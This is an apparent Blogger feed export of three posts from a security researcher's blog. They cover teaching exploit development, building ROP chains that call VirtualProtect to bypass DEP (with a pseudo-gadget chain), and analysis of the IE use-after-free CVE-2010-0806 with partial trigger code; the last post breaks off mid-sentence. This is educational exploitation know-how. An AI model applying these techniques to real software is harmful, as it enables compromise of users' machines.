<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6583006355693901620</id><updated>2011-08-16T20:06:24.359-07:00</updated><category term='ekoparty'/><category term='bug'/><category term='bugs'/><category term='wedding'/><category term='master class'/><category term='file browser'/><category term='heap exploitation'/><category term='pelicula'/><category term='presentacion'/><category term='dvd'/><category term='win32'/><category term='h2hc'/><category term='niguiri'/><category term='japanese'/><category term='windows 2003'/><category term='tokyo'/><category term='ms08-053'/><category term='training'/><category term='bypassing'/><category term='ricoeur'/><category term='soccer'/><category term='justin seitz'/><category term='security'/><category term='keynote'/><category term='visualsploit'/><category term='django'/><category term='bluehat'/><category term='japon'/><category term='fork'/><category term='ben hawkes'/><category term='ms08-067'/><category term='traditional'/><category term='sisifo argentino'/><category term='exploits'/><category term='kyoto'/><category term='hzon'/><category term='use-after-free'/><category term='credential reflection attack'/><category term='hackerspace'/><category term='design'/><category term='nslookup'/><category term='webcam picture'/><category term='explotation'/><category term='immunity'/><category term='compiler'/><category term='vista'/><category term='microsoft tuesday'/><category term='shellcode'/><category term='messi'/><category term='partida'/><category term='slides'/><category term='hiroshima'/><category term='0day'/><category term='luciano bello'/><category term='yakitori'/><category 
term='immunity debugger'/><category term='debugger'/><category term='akihabara'/><category term='hacking'/><category term='blockindex'/><category term='conference'/><category term='md_update'/><category term='assembly'/><category term='tradicional'/><category term='or'/><category term='stack overflow'/><category term='gray hat python'/><category term='returned oriented programming'/><category term='bitacora'/><category term='python'/><category term='enola gay'/><category term='sushi'/><category term='exilio'/><category term='no more free bugs'/><category term='conflicker'/><category term='rop'/><category term='windows'/><category term='mosdef'/><category term='canvas'/><category term='japones'/><category term='count'/><category term='the great bas alberts'/><category term='teaching'/><category term='temples'/><category term='group_by'/><category term='nop certification'/><category term='templos'/><category term='futbol'/><category term='pheap'/><category term='chunkanalizehook'/><category term='sao paulo'/><category term='stealing'/><category term='experience'/><category term='vista heap'/><category term='ucrentry'/><category term='motion detection'/><category term='heap overflow'/><category term='trainings'/><category term='heap cache allocator'/><category term='post'/><category term='brazil'/><category term='sanfrecce'/><category term='bacon'/><category term='argentina'/><category term='pacsec'/><category term='ie_peers'/><category term='miami'/><category term='activex'/><category term='flushing'/><category term='ekoparty 2009'/><category term='cyberdefense'/><category term='casamiento'/><category term='shibuya'/><category term='japan'/><category term='0days'/><category term='miyajima'/><category term='reflexión'/><title type='text'>Etica Nicomana</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/posts/default'/><link rel='self' 
type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>58</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-631245460242816721</id><published>2011-04-26T19:06:00.000-07:00</published><updated>2011-04-26T19:08:23.212-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='immunity'/><category scheme='http://www.blogger.com/atom/ns#' term='teaching'/><category scheme='http://www.blogger.com/atom/ns#' term='master class'/><title type='text'>Teaching exploit development</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.myrmecos.net/ants/Myrmecia5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://www.myrmecos.net/ants/Myrmecia5.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Giving a training is one of the hardest things you will ever experience in a researcher's life (and one of the most rewarding).&lt;br /&gt;Behind the 5 days we spent last week giving the Master Class were months spent working on the material, preparing exercises, etc.&lt;br /&gt;My first thought when I did my first training back in 2004 was that it was simple. I completely mastered the subject I was teaching and the slide deck was pretty solid. 
But that was just one part of the deal: communicating the knowledge is hard and brain consuming. It's not just "explaining" a subject, but rather transferring the knowledge in a way that is exciting, maintains the attention of the class for 8 hours a day and is progressive.&lt;br /&gt;The composition of the class is probably one of the hardest challenges. Classes are generally very heterogeneous, from super skilled people who should be teaching the class with you to people who are completely new to the subject. I always tell the story of my experience in Japan, where on the first day I made everyone introduce themselves and tell me their experience with the heap: two out of the twenty students had no idea what the heap was, and in fact their expertise in security was very physical. They worked installing security doors.&lt;br /&gt;It's really complex to maintain a balance in a class and make everyone happy. You need to be prepared with a series of exercises, and even that won't satisfy the ones most hungry for knowledge, while at the same time you need to have simple exercises and good analogies for the new ones.&lt;br /&gt;Classes on exploitation are a subject of their own. An exploit is something that should not be happening on that machine; you have the whole system against you, and now you are not only teaching it but helping 34 people at the same time, each having all kinds of problems. And the worst part: you have 30 seconds to sit at their machine and understand every step of their logic to help them out.&lt;br /&gt;For all of those reasons, we try to teach methodology over specific exploitation techniques. Bug classes die, primitives don't. And methodology has a lot to do with primitives, whether it is massaging the heap layout to craft a deterministic heap or getting an infoleak out of a use-after-free.&lt;br /&gt;If you attend a class and you think that you are only learning how to use a tool, pack your stuff because you just lost. 
You lost for one of two reasons: they are actually just teaching you how to use a tool and nothing more, or you didn't understand the concept of the class at ALL.&lt;br /&gt;Tools need to be learned to understand the methodology, not because people randomly want to co-opt you into the army of users, but rather because they are providing the tools to move on from that point (of course, there are classes that just focus on tools; try to avoid them). Imagine teaching a class of 34 people with completely different backgrounds about SMT solvers and symbolic execution using the SMT-LIB language (a Lisp-like language), or leaving them by themselves, with their debugger of choice, to hook very specific functions to obtain some information (you will have people using everything from WinDbg to the most obscure debugging library, and you will have to support them and actively help them with their mistakes).&lt;br /&gt;I want to share just one last anecdote that summarizes the blog post. We were working on a use-after-free exercise on the second day of the class, and I had just explained a type of script they had to write to hook specific functions in mshtml.dll to dynamically find soft memleaks on Element properties. Since we were running out of time, I asked the students what they would prefer: continue working on exploiting the bug, or write the script? 
And Halvar answered cleverly as he usually does: "What's the difference?"&lt;br /&gt;&lt;br /&gt;Nico&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-631245460242816721?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/631245460242816721/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=631245460242816721' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/631245460242816721'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/631245460242816721'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2011/04/teaching.html' title='Teaching exploit development'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-210805780475188125</id><published>2010-06-21T14:21:00.000-07:00</published><updated>2010-06-21T14:21:44.756-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='returned oriented programming'/><category scheme='http://www.blogger.com/atom/ns#' term='rop'/><category scheme='http://www.blogger.com/atom/ns#' term='immunity debugger'/><title type='text'>The so called Return Oriented Programming...</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 
href="http://4.bp.blogspot.com/_aUReV5sSeqk/TB_Tyn1wAPI/AAAAAAAAG2M/AO89-d4mfSU/s1600/10931250-lg.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="214" src="http://4.bp.blogspot.com/_aUReV5sSeqk/TB_Tyn1wAPI/AAAAAAAAG2M/AO89-d4mfSU/s320/10931250-lg.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Dear Diary,&lt;br /&gt;I have always hated the name Return Oriented Programming, not because it isn't an accurate name, but just because it sounds like they are reinventing the wheel once again. Paraphrasing Aeschylus, sometimes I think offensive security is just &lt;i&gt;bread crumbs from the great banquet of the hackers of the late 90's&lt;/i&gt;.&lt;br /&gt;Anyway, I recently had to teach a class in Norway; the group of students was very smart, which always helps you push further and further. On the last day, as part of our Advance Stack Overflow class, we taught them how to write a ROP shellcode and then took the next step and had them write their own automated tool.&lt;br /&gt;Obviously, one day is not much time to write your own tool, but it was enough to write their shellcode, which I'm proud to say was half the size of the public exploit I saw.&lt;br /&gt;Since the term started getting over-hyped, I think in a way it has made ROP look farther away and harder than it is. But thinking of ways to teach it in a class made me realize how simple it is. You see some exploits going for the most complicated solutions, while the simple ones are sometimes shorter and more accurate. 
&lt;br /&gt;So let me give you some hints, which are part of the &lt;a href="http://www.immunityinc.com/education-overview.shtml"&gt;Advance Stack Overflow&lt;/a&gt; class at Immunity:&lt;br /&gt;&lt;br /&gt;The first step before starting to write a ROP shellcode is to plan the strategy ahead; otherwise you will be improvising in the middle of your shellcode and the consequences are going to be just ugly.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_aUReV5sSeqk/TB-FX0WX30I/AAAAAAAAG1w/P6VnDAfDYK4/s1600/2010-06-15_11-37-52_597.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_aUReV5sSeqk/TB-FX0WX30I/AAAAAAAAG1w/P6VnDAfDYK4/s320/2010-06-15_11-37-52_597.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Here are some bullet points of what you should be thinking about before starting your shellcode:&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt; &lt;b&gt;Restriction Bypass&lt;/b&gt; &lt;br /&gt;As we know, the trick behind ROP is that you are basing all your return addresses on one or two DLLs whose base is known to you, either through an infoleak or just because of a lack of the REBASE flag.&lt;br /&gt;With that in mind, you need to find out which API functions are being imported (statically or dynamically) in order to decide how you are going to bypass the restriction.&lt;br /&gt;&lt;span style="color: #38761d;"&gt;VirtualAlloc&lt;/span&gt;&lt;br style="color: #38761d;" /&gt;&lt;span style="color: #38761d;"&gt; VirtualProtect&lt;/span&gt;&lt;br style="color: #38761d;" /&gt;&lt;span style="color: #38761d;"&gt; WriteProcessMemory&lt;/span&gt;&lt;br style="color: #38761d;" /&gt;&lt;span style="color: #38761d;"&gt; HeapCreate/HeapAlloc&lt;/span&gt;&lt;br style="color: #38761d;" /&gt; &lt;br /&gt;There are probably a bunch more; you just need to use your imagination. 
A recent paper from &lt;a href="http://www.insomniasec.com/publications/DEPinDepth.ppt"&gt;Brett Moore&lt;/a&gt; made me realize you can use the same trick too. &lt;br /&gt;Let's say you don't have access to any of those API functions, so, as you can see, the field to play with is very small; an interesting way to potentially bypass it would be to use GlobalAlloc, or any kind of heap wrapper.&lt;br /&gt;When we call any of those functions with a normal size, it returns us a memory chunk. With the address of the memory chunk we can easily obtain the Heap Segment http://www.nirsoft.net/kernel_struct/vista/HEAP_SEGMENT.html (usually the LSBs are zero). Once you get the Heap Segment, you can grab the address of the PHEAP from it and change the permission flag into EXECUTABLE HEAP. Then the next step is to force a second allocation of a size big enough that it is going to use VirtualAlloc, and make it executable. Voila!&lt;/li&gt;&lt;li&gt; &lt;b&gt;Which registers do we control?&lt;/b&gt;&lt;br /&gt;a) Can we control the content of all the registers? (In Immunity Debugger a good way to check is just to look for a POP R32/RETN.)&lt;br /&gt;b) Exchange / Move between registers: all kinds of combinations and flavours, whether it is just a “MOV RA, RB”, “OR RA, RB” or “XCHG RA, RB”, and so on. Swapping with ESP is always important.&lt;br /&gt;c) Register logic: look for different types of register logic; this will allow you to later bypass bad character restrictions. 
(NEG R32, etc.)&lt;/li&gt;&lt;li&gt; &lt;b&gt;Memory Access Instructions &lt;/b&gt;&lt;br /&gt;You will most likely be doing a lot of READ / WRITE operations; that's the main point of the so-called ROP.&lt;br /&gt;MOV [R32], R32&lt;br /&gt;MOV R32, [R32]&lt;br /&gt;&lt;/li&gt;&lt;li&gt; &lt;b&gt;CPU Context&lt;/b&gt;&lt;br /&gt;Very important to reduce the number of dwords used: always check whether there is more than just ESP pointing to the controlled buffer.&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Exploiting 101 &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;The main trick to make ROP very simple (if we can really call it a trick) is just to generate a parallel stack for calling functions. The parallel stack needs to be created at a known address (if possible, which most of the time it is; otherwise we can use ESP itself). If you know the base address of your DLL, you can most of the time calculate the address of the .data (RW) section. That's a good spot to start creating your parallel stack (there are static RW pages at the same address across all versions of Windows, but that is an exercise for the readers).&lt;br /&gt;&lt;br /&gt;In the exercise we were exploiting in class, we were able to answer all of the questions in the strategy: we had VirtualProtect imported, all the registers could be written with whatever we wanted, we were able to xchg with the stack, we had all kinds of combinations of memory READ and WRITE, and finally EBP was pointing to our stack.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: blue;"&gt;pop&lt;/span&gt;  R32/ ret            // All the registers&lt;br /&gt;&lt;span style="color: blue;"&gt;mov&lt;/span&gt; [ecx], eax / ret  // Write to ECX&lt;br /&gt;&lt;span style="color: blue;"&gt;mov&lt;/span&gt; eax, [ecx] / ret   // Read from ECX&lt;br /&gt;&lt;span style="color: blue;"&gt;mov&lt;/span&gt; [eax], ebp / ret   // Write to EAX content of EBP&lt;br /&gt;&lt;span style="color: blue;"&gt;xchg&lt;/span&gt;  eax, esp            // 
Exchange eax with ESP&lt;br /&gt;&lt;span style="color: blue;"&gt;neg&lt;/span&gt; eax                      // To bypass character restrictions&lt;br /&gt;&lt;br /&gt;With that combination, creating the parallel stack to call VirtualProtect on our stack was trivial:&lt;br /&gt;We just need to get the address of VirtualProtect, copy it into the parallel stack and start writing all the arguments of VirtualProtect into the parallel stack; for the address to “unprotect” we used the stack itself, taken from EBP, and the other arguments were just trivial to craft. At the end, you xchg ESP with your parallel stack, which will execute VirtualProtect (with the same ret2libc trick you were using) and later jump back to the stack, this time to actually execute your shellcode.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;PSEUDO RETURN ADDRESS OPCODE CODE:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: blue;"&gt;POP&lt;/span&gt; ECX &lt;br /&gt;&lt;div style="color: red;"&gt;VIRTUALPROTECT IMPORT&lt;/div&gt;&lt;span style="color: blue;"&gt;MOV&lt;/span&gt; EAX, [ECX]  // EAX now holds the address of VirtualProtect&lt;br /&gt;&lt;span style="color: blue;"&gt;POP&lt;/span&gt; ECX&lt;br /&gt;&lt;span style="color: red;"&gt;DATA  ADDR&lt;/span&gt;           // ECX =  DATA &lt;br /&gt;&lt;span style="color: blue;"&gt;MOV&lt;/span&gt; [ECX], EAX   //   Parallel Stack :  0: [  VirtualProtect ]&lt;br /&gt;&lt;span style="color: blue;"&gt;POP&lt;/span&gt; EAX&lt;br /&gt;&lt;span style="color: red;"&gt;DATA ADDR+8&lt;/span&gt;       // EAX = ADDR+8&lt;br /&gt;&lt;span style="color: blue;"&gt;MOV&lt;/span&gt; [EAX], EBP   //    Parallel Stack:   8 [ Address of Stack ]&lt;br /&gt;&lt;span style="color: blue;"&gt;POP&lt;/span&gt; EAX&lt;br /&gt;&lt;div style="color: red;"&gt;-0x2000&lt;/div&gt;&lt;span style="color: blue;"&gt;NEG&lt;/span&gt; EAX                // EAX= 0x2000     Bypassing bad characters&lt;br /&gt;&lt;span style="color: blue;"&gt;POP&lt;/span&gt; ECX&lt;br /&gt;&lt;span style="color: red;"&gt;DATA + 0xC&lt;/span&gt;             // ECX = DATA + 0xC&lt;br /&gt;&lt;span style="color: blue;"&gt;MOV&lt;/span&gt; [ECX], EAX   //   Parallel Stack :  C: [  Size: 0x2000 ]&lt;br /&gt;&lt;span style="color: blue;"&gt;POP&lt;/span&gt; EAX&lt;br /&gt;&lt;span style="color: red;"&gt;-0x40&lt;/span&gt;                        // EAX = -0x40        &lt;br /&gt;&lt;span style="color: blue;"&gt;NEG&lt;/span&gt; EAX                 // EAX = 0x40&lt;br /&gt;&lt;span style="color: blue;"&gt;POP&lt;/span&gt; ECX                 &lt;br /&gt;&lt;span style="color: red;"&gt;DATA + 0xC&lt;/span&gt;             // ECX = DATA+0xC&lt;br /&gt;&lt;span style="color: blue;"&gt;MOV&lt;/span&gt; [ECX], EAX   //   Parallel Stack :  0x10: [  Flag: 0x40 ]&lt;br /&gt;&lt;span style="color: blue;"&gt;POP&lt;/span&gt; ECX&lt;br /&gt;&lt;span style="color: red;"&gt;DATA + 0x10&lt;/span&gt;           // ecx = data+0x10&lt;br /&gt;&lt;span style="color: blue;"&gt;POP&lt;/span&gt; EAX&lt;br /&gt;&lt;span style="color: red;"&gt;DATA + 0x60&lt;/span&gt;           // eax = data+0x60&lt;br /&gt;&lt;span style="color: blue;"&gt;MOV&lt;/span&gt; [ECX], EAX   //   Parallel Stack :  0x14: [  OldProtect: Writable address in data ]&lt;br /&gt;&lt;span style="color: blue;"&gt;POP&lt;/span&gt; EAX                  &lt;br /&gt;&lt;span style="color: red;"&gt;DATA&lt;/span&gt;                        // eax = data&lt;br /&gt;&lt;span style="color: blue;"&gt;XCHG&lt;/span&gt; EAX, ESP &lt;br /&gt;&lt;br /&gt;At this point in the code we switch to a parallel stack that looks like:&lt;br /&gt;&lt;br /&gt;[ &lt;span style="color: #274e13;"&gt;VirtualProtect&lt;/span&gt; ]&lt;br /&gt;[ &lt;span style="color: #274e13;"&gt; XXXXXXXX&lt;/span&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ]&lt;br /&gt;[ &lt;span style="color: #274e13;"&gt; Stack addr&lt;/span&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;      ]&lt;br /&gt;[ &lt;span style="color: #274e13;"&gt; 
0x2000&lt;/span&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;           ]&lt;br /&gt;[ &lt;span style="color: #274e13;"&gt; 0x40&lt;/span&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;               ]&lt;br /&gt;[ &lt;span style="color: #274e13;"&gt;  DATA +0x60&lt;/span&gt;&amp;nbsp;&amp;nbsp; ]&lt;br /&gt;&lt;br /&gt;When the new parallel stack gets executed, it will call VirtualProtect on our stack address and later return to XXXXX (I didn't set it, but that should be your stack :)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Conclusion&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Once you get shellcode execution, you should go back to your very simple primitives and try to find sequences of opcodes that do what you want in fewer steps, like a combination of POPs or multiple memory accesses. Always keep in mind that the fewer return addresses you have, the easier it is to port and make universal (?).&lt;br /&gt;The lesson learned is that a ROP shellcode can easily be understood and written as a series of calls, reads and writes.&amp;nbsp; &lt;br /&gt;In the end, this is nothing more than the old school return-to-libc. I recommend reading Pablo's 2008 presentation about &lt;a href="http://www.immunityinc.com/downloads/DEPLIB.pdf"&gt;DEPLIB&lt;/a&gt;&amp;nbsp; for ideas on how to write your own ROP tool.&lt;br /&gt;Sorry for the lack of images or screenshots, but I actually should be spending all my free time getting my research done for &lt;a href="https://www.blackhat.com/html/bh-us-10/bh-us-10-schedule.html"&gt;Blackhat&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;The picture on this post was taken by &lt;a href="http://photo.net/photodb/photo?photo_id=10931250&amp;amp;size=lg"&gt;Igor Siwanowicz&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 
src='https://blogger.googleusercontent.com/tracker/6583006355693901620-210805780475188125?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/210805780475188125/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=210805780475188125' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/210805780475188125'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/210805780475188125'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2010/06/so-called-return-oriented-programming.html' title='The so called Return Oriented Programming...'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_aUReV5sSeqk/TB_Tyn1wAPI/AAAAAAAAG2M/AO89-d4mfSU/s72-c/10931250-lg.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-1460843549621706847</id><published>2010-03-26T05:01:00.000-07:00</published><updated>2010-03-26T08:47:43.868-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='use-after-free'/><category scheme='http://www.blogger.com/atom/ns#' term='ie_peers'/><title type='text'>(A)leatory (P)ersitent (T)hreat</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://farm3.static.flickr.com/2499/4081467571_a32815d00d_o.jpg"&gt;&lt;img style="margin: 0px auto 10px; 
display: block; text-align: center; cursor: pointer; width: 624px; height: 464px;" src="http://farm3.static.flickr.com/2499/4081467571_a32815d00d_o.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The &lt;a href="http://dictionary.reference.com/browse/aleatory?jss=0"&gt;Random House Dictionary&lt;/a&gt; defines aleatory as:&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2.&lt;/span&gt; &lt;span style="font-style: italic;"&gt;of or pertaining to accidental causes; of luck or chance; unpredictable: an aleatory element.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I will stay with&lt;span style="font-style: italic;"&gt; accidental causes&lt;/span&gt;, or just plain &lt;span style="font-style: italic;"&gt;luck&lt;/span&gt;, to describe the exploit that was found in the wild for the CVE-2010-0806 vulnerability a couple of weeks ago. The bug is nothing more than a 0day found in the wild, attached to your favourite trojan (Zeus in this case), that works against Internet Explorer 6-7.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;The bug&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The bug class is what we know as a use-after-free, which means that at some point some object is freed but we continue to use it. A good example of this bug class outside a browser was the 2001 globbing capabilities bug in wu-ftpd that people cleverly exploited (yes, pretty much everything was done by 2001).&lt;br /&gt;In the case of CVE-2010-0806 (a.k.a. ie_peers), the bug is in an old DHTML feature called &lt;a href="http://msdn.microsoft.com/en-us/library/ms531079%28VS.85%29.aspx"&gt;behaviours&lt;/a&gt;: "&lt;span style="font-style: italic;"&gt;DHTML behaviors are components that encapsulate specific functionality or behavior on a page&lt;/span&gt;".&lt;br /&gt;The bug itself is triggered when trying to persist an object using setAttribute, which ends up calling VariantChangeTypeEx with both the source and the destination being the same variant. 
So if you send an &lt;a href="http://msdn.microsoft.com/en-us/library/ms897140.aspx"&gt;IDISPATCH&lt;/a&gt; as a variant, the algorithm will try to do a VariantClear of the destination before using it. This ends up in a call to PlainRelease, which decrements the reference count and cleans up the object.&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_aUReV5sSeqk/S6y-r71CrBI/AAAAAAAAGsc/c53CaB2ZvUs/s1600/aaa_samevar.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 38px;" src="http://4.bp.blogspot.com/_aUReV5sSeqk/S6y-r71CrBI/AAAAAAAAGsc/c53CaB2ZvUs/s320/aaa_samevar.png" alt="" id="BLOGGER_PHOTO_ID_5452942910842645522" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;font-size:78%;" &gt;VariantChangeTypeEx called with the same source and destination&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Mark Dowd, the internet security oracle, already talked about this kind of potential bug here: &lt;a href="http://www.hustlelabs.com/stuff/bh2009_dowd_smith_dewey.pdf"&gt;bh2009_dowd_smith_dewey.pdf&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Pertaining to accidental causes&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;When I first read the Chinese/Russian exploit, I was thrilled by how it really works. 
Especially since my conception of a use-after-free was:&lt;br /&gt;1) free the object&lt;br /&gt;2) allocate memory to fill it&lt;br /&gt;3) use it&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_aUReV5sSeqk/S6y_TgMlKlI/AAAAAAAAGsk/BXSuzkYFNhE/s1600/aaa_variantclear.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 79px;" src="http://2.bp.blogspot.com/_aUReV5sSeqk/S6y_TgMlKlI/AAAAAAAAGsk/BXSuzkYFNhE/s400/aaa_variantclear.png" alt="" id="BLOGGER_PHOTO_ID_5452943590619949650" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;font-size:78%;" &gt;VariantClear will decrement the reference counter or free the object&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Well, my conception of a use-after-free remains the same, but the in-the-wild exploit was just relying on the mystery of heap randomness to make this exploit execute shellcode.&lt;br /&gt;The exploit first does a common heap spray with shellcode, then just runs the use-after-free trying to free the window object, and then just waits for the Lord to work in mysterious ways and execute shellcode 1 out of 10 times. This is what we call at Immunity: pray-after-free.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Exploiting&lt;/span&gt;&lt;br /&gt;The exploitation mechanism of a use-after-free is very simple: everything that was freed needs to be reallocated with something we control. You can use every resource you want; just be sure that whatever you are allocating, it has to be on the exact same heap.&lt;br /&gt;Another important decision is what to free. The public exploit uses the window global, which to me looks like something that could potentially be used before we fill it. 
That's why creating your own element is always recommended.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;var p = document.createElement("BODY");&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Creating our own element also gives us a very good idea of the reference count of the object: instead of just looping 10 times, we just call setAttribute on the created element.&lt;br /&gt;On the TEAROFF classes, such as the Elements returned by document.createElement, the decref is done through PlainRelease. This function has 2 dwords where it caches the thunk before actually freeing it.&lt;br /&gt;We need to do two more setAttribute calls in order to take p out of the cache and call MemFree.&lt;br /&gt;e.setAttribute('s', p);&lt;br /&gt;e.setAttribute('s', t);&lt;br /&gt;e.setAttribute('s', w); // This VarClear call is when it is actually going to free the chunk.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The Element objects are allocated on the default heap, so our soft-memleak needs to be on the same heap. Strings are allocated through SysAllocateLen, which ends up on the default heap as explained in Sotirov's Heap Feng Shui, but (there is always a but...) 
